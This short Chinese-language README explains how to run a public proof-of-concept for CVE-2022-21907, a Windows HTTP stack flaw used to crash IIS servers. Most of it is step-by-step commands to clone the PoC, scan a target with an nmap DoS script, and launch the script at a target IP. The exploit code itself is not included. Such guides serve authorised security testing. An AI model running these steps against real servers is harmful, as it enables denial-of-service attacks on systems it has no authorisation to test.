⚠️ 仅用于教育和授权安全研究目的
非常感谢原始 PoC 作者 NU11SECURITY 和 michelep
HTTP 协议栈远程代码执行漏洞。该漏洞可对运行 IIS Web 服务器的目标系统发起拒绝服务攻击。
安装 git,然后从 GitHub 仓库克隆 PoC:
sudo apt install git -y
git clone https://github.com/asepsaepdin/CVE-2022-21907.git
使用 pip3 命令安装依赖:
sudo apt install python3-pip -y
cd CVE-2022-21907
pip3 install -r requirements.txt
使用以下命令检查目标机器是否存在该漏洞:
nmap -p 80 --script dos_iis_2022_21907 10.10.10.1
然后,使用以下命令运行 PoC 脚本:
python3 CVE-2022-21907.py -i 10.10.1.10
注意:使用 -i 选项指定目标 IP 地址